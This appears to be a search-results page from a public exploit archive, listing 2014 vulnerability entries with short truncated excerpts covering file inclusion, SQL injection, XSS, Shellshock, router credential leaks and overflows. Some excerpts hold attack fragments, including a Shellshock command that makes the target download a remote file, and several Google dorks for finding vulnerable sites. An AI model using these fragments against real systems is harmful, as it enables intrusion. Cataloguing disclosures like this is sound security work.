41207 matches found
GS Foto Uebertraeger 3.0 iOS - Local File Inclusion
GS Foto Uebertraeger 3.0 iOS - Local File Inclusion Document Title: =============== GS Foto Uebertraeger v3.0 iOS - File Include Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1325 Release Date: ============= 2014-09-22 Vulnerability...
Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)
Microsoft Exchange - IIS HTTP Internal IP Address Disclosure Metasploit Exploit Title: Microsoft Exchange IIS HTTP Internal IP Disclosure Vulnerability Google Dork: NA Date: 08/01/2014 Exploit Author: Nate Power Vendor Homepage: microsoft.com Software Link: NA Version: Exchange OWA 2003, Exchange...
Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.0 Bypass) (MS12-037)
Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR + DEP + EMET 5.0 Bypass MS12-037 function strtointstr return str.charCodeAt10x10000 + str.charCodeAt0; var free = "EEEE"; while free.length 500 free += free; var string1 = "AAAA"; while string1.length 500 string1 += string1; var string2...
OpenFiler 2.99.1 - Cross-Site Request Forgery
OpenFiler 2.99.1 - Cross-Site Request Forgery DoS...
dbPowerAmp 2.010.0 - Local Buffer Overflow
dbPowerAmp 2.010.0 - Local Buffer Overflow dbPowerAmp Buffer Overflow Vendor: Illustrate Product: dbPowerAmp Version: = 2.0/10.0 Website: http://www.dbpoweramp.com BID: 11266 CVE: CVE-2004-1569 OSVDB: 10380 11126 11127 SECUNIA: 12684 PACKETSTORM: 34531 Description: Often called the Swiss Army kni...
Typo3 Extension JobControl 2.14.0 - Cross-Site Scripting SQL Injection
Typo3 Extension JobControl 2.14.0 - Cross-Site Scripting SQL Injection Mogwai Security Advisory MSA-2014-02 ---------------------------------------------------------------------- Title: JobControl dmmjobcontrol Multiple Vulnerabilities Product: dmmjobcontrol Typo3 Extension Affected versions:...
Nucom ADSL ADSLR5000UN - ISP Credentials Disclosure
Nucom ADSL ADSLR5000UN - ISP Credentials Disclosure !/usr/bin/perl Exploit Author: Sebastián Magof Hardware: Modem Nucom ADSL R5000UNv2 Software Version: R5TC008 Vulnerable file: guidewan.html location: http://gateway/telecomGUI/guidewan.html Bug: ISP usr+pwd disclosure Type: Local Date: 24/09/20...
Cart Engine 3.0 - Multiple Vulnerabilities
Cart Engine 3.0 - Multiple Vulnerabilities === Details === Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/ Affected Product: Cart Engine Version: 3.0 === Executive Summary === SQL Injection: Using a specially...
OSClass 3.4.1 - index.php Local File Inclusion
OSClass 3.4.1 - index.php Local File Inclusion Information ----------- Advisory by Netsparker. Name : LFI Vulnerability in OsClass Affected Software : OsClass Affected Versions: 3.4.1 and possibly below Vendor Homepage : http://osclass.org/ Vulnerability Type : Local File Inclusion Severity :...
WordPress Plugin Login Widget With ShortCode 3.1.1 - Multiple Vulnerabilities
WordPress Plugin Login Widget With ShortCode 3.1.1 - Multiple Vulnerabilities Details ================ Software: Login Widget With Shortcode Version: 3.1.1 Homepage: http://wordpress.org/plugins/login-sidebar-widget/ Advisory report:...
GNU Bash - Shellshock Environment Variable Command Injection
GNU Bash - Shellshock Environment Variable Command Injection Exploit Database Note: The following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Like “real” programming languages, Bash has functions, though in a...
Bash - Shellshock Environment Variables Command Injection
Bash - Shellshock Environment Variables Command Injection /cgi-bin/ -c cmd Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit" Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271remotecodeexecutionthroughbash/ Test CGI Code : !/bin/bash...
WordPress Plugin All In One WP Security 3.8.2 - SQL Injection
WordPress Plugin All In One WP Security 3.8.2 - SQL Injection Advisory ID: HTB23231 Product: All In One WP Security WordPress plugin Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy Vulnerable Versions: 3.8.2 and probably prior Tested Version: 3.8.2 Advisory Publication: September 3, 2014 without...
GNU Bash - Environment Variable Command Injection (Metasploit)
GNU Bash - Environment Variable Command Injection Metasploit require 'msf/core' class Metasploit3 'bashedCgi', 'Description' = %q Quick & dirty module to send the BASH exploit payload CVE-2014-6271 to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. , 'Author...
ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure
ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure !/usr/bin/perl Exploit Author: Sebastián Magof Hardware: ZyXEL Prestig P-660HNU-T1 Vulnerable file: wzADSL.asp location: http://gateway/cgi-bin/wzADSL.asp Bug: ISP usr+pwd disclosure Type: Local Date: 22/09/2014 Vendor Homepage:...
Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting
Restaurant Script PizzaInn Project - Persistent Cross-Site Scripting Title: Pizza Inn Registration Stored XSS Severity: High CVE-ID: CVE-2014-6619 Release Date: 20 September 2014 Author: Kenneth F. Belva Websites: http://silverbackventuresllc.com http://xssWarrior.com http://securitymaverick.com...
WS10 Data Server - SCADA Overflow (PoC)
WS10 Data Server - SCADA Overflow PoC Exploit Title: WS10 Data Server SCADA Exploit Overflow PoC Date: 09/23/2014 Author: Pedro Sánchez Version: 1.83 English Tested on: Windows 7 embedded. Notified the vendor, vendor never responded. In the new version this PoC stops working Vendor: Novus...
Glype 1.4.9 - Local Address Filter Bypass
Glype 1.4.9 - Local Address Filter Bypass ------------------------------------------------------------------------ Glype proxy local address filter bypass ------------------------------------------------------------------------ Securify, September 2014...
Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion
Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion ------------------------------------------------------------------------ Glype proxy cookie jar path traversal allows code execution ------------------------------------------------------------------------ Securify, September...
webEdition 6.3.8.0 (SVN-Revision: 6985) - Directory Traversal
webEdition 6.3.8.0 SVN-Revision: 6985 - Directory Traversal Advisory ID: HTB23227 Product: webEdition Vendor: webEdition e.V. Vulnerable Versions: 6.3.8.0 SVN-Revision: 6985 and probably prior Tested Version: 6.3.8.0 SVN-Revision: 6985 Advisory Publication: August 6, 2014 without technical detail...
Joomla! Component com_macgallery 1.5 - Arbitrary File Download
Joomla! Component com_macgallery 1.5 - Arbitrary File Download Exploit Title : Joomla Mac Gallery = 1.5 Arbitrary File Download Exploit Author : Claudio Viviani Vendor Homepage : https://www.apptha.com Software Link : https://www.apptha.com/downloadable/download/sample/sampleid/18 Dork Google:...
Joomla! Component com_facegallery 1.0 - Multiple Vulnerabilities
Joomla! Component com_facegallery 1.0 - Multiple Vulnerabilities Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities Exploit Author : Claudio Viviani Vendor Homepage : https://www.apptha.com Software Link : https://www.apptha.com/downloadable/download/sample/sampleid/150 Dork Google:...
Onlineon E-Ticaret - Database Disclosure
Onlineon E-Ticaret - Database Disclosure !/usr/bin/env python -- coding:cp1254 -- Title : Onlineon E-Ticaret Database Disclosure Exploit .py dork : inurl:"default.asp?git=sepet" Author : ZoRLu / [email protected] / [email protected] Home : http://milw00rm.com / its online Download :...
LittleSite 0.1 - index.php Local File Inclusion
LittleSite 0.1 - index.php Local File Inclusion source: https://www.securityfocus.com/bid/43495/info LittleSite is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive...
vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection
vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection Title: vBulletin Verify Email Before Registration Plugin - SQL Injection Date: September 19 2014 Version: Any vBulletin 4.. version which has the plugin installed. Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164...
MMonit 3.3.2 - Cross-Site Request Forgery
MMonit 3.3.2 - Cross-Site Request Forgery Vulnerability title: M/Monit CSRF Author: Dolev Farhi Contact: dolevf at openflare dot com @dolevff Application: M/Monit 3.2.2 Date: 13.9.2014 Relevant CVEs: N/A Vulnerable version: CSRF PoC for M/monit input type="hidden...
Livefyre LiveComments Plugin - Persistent Cross-Site Scripting
Livefyre LiveComments Plugin - Persistent Cross-Site Scripting Title : Stored XSS in Livefyre LiveComments Plugin CVE : 2014-6420 Vendor Homepage : http://livefyre.com Software Link : http://web.livefyre.com/streamhub/liveComments Version : v3.0 Author : Brij Kishore Mishra Date : 03-Sept-2014...
ClassApps SelectSurvey.net - Multiple SQL Injections
ClassApps SelectSurvey.net - Multiple SQL Injections Exploit Title: Multiple SQL Injection Vulnerabilities in SelectSurvey.net Google Dork: intitle:SelectSurvey Date: Sep 03 2014 Vendor Homepage: https://www.classapps.com/ Software Link: https://www.classapps.com/SelectSurveyNETOverview.asp...
Fast Image Resizer 098 - Local Crash (PoC)
Fast Image Resizer 098 - Local Crash PoC !/usr/bin/perl Title : Fast Image Resizer 098 Local Crash Poc Author: Niko Tested: Windows XP SP3 En Apps : http://adionsoft.net/fastimageresize/FastImageResizer098.exe EAX 00000000 ECX 010422F8 EDX 00000000 EBX 00000000 ESP 0012F658 EBP 00000000 ESI...
Seafile-server 3.1.5 - Remote Denial of Service
Seafile-server 3.1.5 - Remote Denial of Service Exploit Title: ccnet-server remote DoS assert seafile-server = 3.1.5 Date: Sep 4, 2014 Exploit Author: retset Vendor Homepage: seafile.com Software Link: https://bitbucket.org/haiwen/seafile/downloads/seafile-server3.1.4win32.tar.gz Version:...
WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python)
WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload Python !/usr/bin/env python WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability CVE-2014-5460 Vulnerability discovered by: Jesus...
Laravel - Hash::make() Password Truncation Security
Laravel - Hash::make Password Truncation Security source: https://www.securityfocus.com/bid/69849/info Laravel is prone to a security weakness due to pseudo password hash collision. Attackers can exploit this issue to bypass intended security restrictions. This may aid in further attacks. // user...
USBWiFi Flash Drive 1.3 iOS - Code Execution
USBWiFi Flash Drive 1.3 iOS - Code Execution Document Title: =============== USB&WiFi Flash Drive 1.3 iOS - Code Execution Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1316 Release Date: ============= 2014-09-15 Vulnerability Laboratory ...
ZTE ZXDSL-931VII - Configuration Dump
ZTE ZXDSL-931VII - Configuration Dump Exploit Title: ZTE ZXDSL-931VII Unauthenticated Configuration Dump Google Dork: use your imagination Date: 09-12-2014 Exploit Author: L0ukanik0sGR Vendor Homepage: www.zte.com.cn Software Link:...
Briefcase 4.0 iOS - Code Execution File Inclusion
Briefcase 4.0 iOS - Code Execution File Inclusion Document Title: =============== Briefcase 4.0 iOS - Code Execution & File Include Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1319 Release Date: ============= 2014-09-11 Vulnerability...
ALCASAR 2.8.1 - Remote Code Execution
ALCASAR 2.8.1 - Remote Code Execution !/usr/bin/env python -- coding: utf-8 -- ALCASAR = 2.8.1 Remote Root Code Execution Vulnerability Author: eF Date : 2014-09-12 URL : http://www.alcasar.net/ This is not a responsible disclosure coz' I have no sense of ethics and I don't give a fck. db 88...
CacheGuard-OS 5.7.7 - Cross-Site Request Forgery
CacheGuard-OS 5.7.7 - Cross-Site Request Forgery I. VULNERABILITY ------------------------- CSRF vulnerabilities in CacheGuard-OS v5.7.7 II. BACKGROUND ------------------------- CacheGuard is an All-in-One Web Security Gateway providing firewall, web antivirus, caching, compression, URL filtering...
Aztech Routers - cgi-binAZ_Retrain.cgi Denial of Service
Aztech Routers - cgi-binAZ_Retrain.cgi Denial of Service / source: https://www.securityfocus.com/bid/69809/info Multiple Aztech routers are prone to a denial-of-service vulnerability. Attackers may exploit this issue to cause an affected device to crash, resulting in a denial-of-service condition...
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)
Rejetto HTTP File Server HFS 2.3.x - Remote Command Execution 1 Exploit Title: HttpFileServer 2.3.x Remote Command Execution Google Dork: intext:"httpfileserver 2.3" Date: 11-09-2014 Remote: Yes Exploit Author: Daniele Linguaglossa Vendor Homepage: http://rejetto.com/ Software Link:...
Aztech Modem Routers - Session Hijacking
Aztech Modem Routers - Session Hijacking source: https://www.securityfocus.com/bid/69811/info Multiple Aztech Modem Routers are prone to a session-hijacking vulnerability. An attacker can exploit this issue to gain unauthorized access to the affected device. !/usr/bin/perl Title: Aztech Modem...
Aztech Modem Routers - Information Disclosure
Aztech Modem Routers - Information Disclosure / source: https://www.securityfocus.com/bid/69808/info Aztech Modem Routers are prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. / HOST=$1...
WordPress Plugin Wordfence Security - Multiple Vulnerabilities
WordPress Plugin Wordfence Security - Multiple Vulnerabilities source: https://www.securityfocus.com/bid/69815/info The Wordfence Security Plugin for WordPress is prone to following vulnerabilities: 1. Multiple HTML-Injection vulnerabilities 2. Multiple Security Bypass vulnerabilities Successful...
Comodo Internet Security - HIPSSandbox Escape
Comodo Internet Security - HIPSSandbox Escape Exploit: http://www.joxeankoret.com/download/comodosandboxescape/sandboxtest1.tar.gz Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34648.tar.gz sandboxtest1.tar.gz Video:...
Ammyy Admin 3.5 - Remote Code Execution (Metasploit)
Ammyy Admin 3.5 - Remote Code Execution Metasploit Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34647.zip aa0day.zip The Revenge of the Scammers This exploit is an 0day in Ammyy Admin http://www.ammyy.com/en/ a remote desktop type software that is wel...
Joomla! Component com_formmaker 3.4 - SQL Injection
Joomla! Component com_formmaker 3.4 - SQL Injection Exploit Title : Joomla Spider Form Maker = 3.4 SQL Injection Exploit Author : Claudio Viviani Vendor Homepage : http://web-dorado.com/ Software Link : http://web-dorado.com/products/joomla-form.html Dork Google: inurl:comformmaker Date : 2014-09-...
Food Order Portal - admin_user_delete.php Cross-Site Request Forgery
Food Order Portal - admin_user_delete.php Cross-Site Request Forgery source: https://www.securityfocus.com/bid/69787/info Food Order Portal is prone to a cross-site request-forgery vulnerability. An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the...
OroCRM - Persistent Cross-Site Scripting
OroCRM - Persistent Cross-Site Scripting Affected software: OroCRM is an easy-to-use, open source CRM with built in marketing automation tools for your commerce business. It's the CRM built for both sales and marketing! Discovered by: Provensec Website: http://www.provensec.com Author: Provensec...
ChatSecure IM 2.2.4 iOS - Persistent Cross-Site Scripting
ChatSecure IM 2.2.4 iOS - Persistent Cross-Site Scripting Document Title: =============== ChatSecure IM v2.2.4 iOS - Persistent Web Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1317 Release Date: ============= 2014-09-10 Vulnerability...
Photorange 1.0 iOS - Local File Inclusion
Photorange 1.0 iOS - Local File Inclusion Document Title: =============== Photorange v1.0 iOS - File Include Web Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1318 Release Date: ============= 2014-09-07 Vulnerability Laboratory ID VL-ID:...
Joomla! Component Spider Contacts 1.3.6 - contacts_id SQL Injection
Joomla! Component Spider Contacts 1.3.6 - contacts_id SQL Injection !/usr/bin/env python Exploit Title : Joomla Spider Contacts = 1.3.6 SQL Injection Exploit Author : Claudio Viviani Vendor Homepage : http://web-dorado.com/ Software Link :...